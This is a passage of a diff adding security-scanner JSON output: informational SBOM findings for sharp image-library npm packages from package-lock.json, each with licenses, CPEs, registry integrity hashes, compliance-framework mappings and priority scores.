+ "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7de94e70bc6a1409", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4", + "title": "@img/sharp-libvips-linuxmusl-arm64 1.2.4", + "description": "Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "67f7722888e07f97", + "name": "@img/sharp-libvips-linuxmusl-arm64", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-arm64:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-arm64:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_arm64:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_arm64:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-arm64/-/sharp-libvips-linuxmusl-arm64-1.2.4.tgz", + "integrity": "sha512-FVQHuwx1IIuNow9QAbYUzJ+En8KcVm9Lk5+uGUQJHaZmMECZmOlix9HnH7n1TRkXMS0pGxIJokIVB9SuqZGGXw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c540ef9b43418974", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4", + "title": "@img/sharp-libvips-linuxmusl-x64 1.2.4", + "description": "Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "61da63d4bf468c4d", + "name": "@img/sharp-libvips-linuxmusl-x64", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-x64:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-x64:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_x64:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_x64:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-x64/-/sharp-libvips-linuxmusl-x64-1.2.4.tgz", + "integrity": "sha512-+LpyBk7L44ZIXwz/VYfglaX/okxezESc6UxDSoyo2Ks6Jxc4Y7sGjpgU9s4PMgqgjj1gZCylTieNamqA1MF7Dg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9ac46491201655bd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-linux-arm 0.34.5", + "title": "@img/sharp-linux-arm 0.34.5", + "description": "Package discovered: @img/sharp-linux-arm 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "dcf7df343a75d233", + "name": "@img/sharp-linux-arm", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-arm:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-arm:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_arm:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_arm:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-linux-arm@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-linux-arm/-/sharp-linux-arm-0.34.5.tgz", + "integrity": "sha512-9dLqsvwtg1uuXBGZKsxem9595+ujv0sJ6Vi8wcTANSFpwV/GONat5eCkzQo/1O6zRIkh0m/8+5BjrRr7jDUSZw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f3729e97d1846b60", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-linux-arm64 0.34.5", + "title": "@img/sharp-linux-arm64 0.34.5", + "description": "Package discovered: @img/sharp-linux-arm64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fd64c295f8bc0b6a", + "name": "@img/sharp-linux-arm64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-arm64:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-arm64:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_arm64:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_arm64:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-linux-arm64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-linux-arm64/-/sharp-linux-arm64-0.34.5.tgz", + "integrity": "sha512-bKQzaJRY/bkPOXyKx5EVup7qkaojECG6NLYswgktOZjaXecSAeCWiZwwiFf3/Y+O1HrauiE3FVsGxFg8c24rZg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7108a685f3138a28", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-linux-ppc64 0.34.5", + "title": "@img/sharp-linux-ppc64 0.34.5", + "description": "Package discovered: @img/sharp-linux-ppc64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3b1510e0e0b839b3", + "name": "@img/sharp-linux-ppc64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-ppc64:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-ppc64:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_ppc64:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_ppc64:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-linux-ppc64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-linux-ppc64/-/sharp-linux-ppc64-0.34.5.tgz", + "integrity": "sha512-7zznwNaqW6YtsfrGGDA6BRkISKAAE1Jo0QdpNYXNMHu2+0dTrPflTLNkpc8l7MUP5M16ZJcUvysVWWrMefZquA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7bce516733b8ed22", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-linux-riscv64 0.34.5", + "title": "@img/sharp-linux-riscv64 0.34.5", + "description": "Package discovered: @img/sharp-linux-riscv64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "523b83e120964834", + "name": "@img/sharp-linux-riscv64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-riscv64:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-riscv64:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_riscv64:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_riscv64:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": 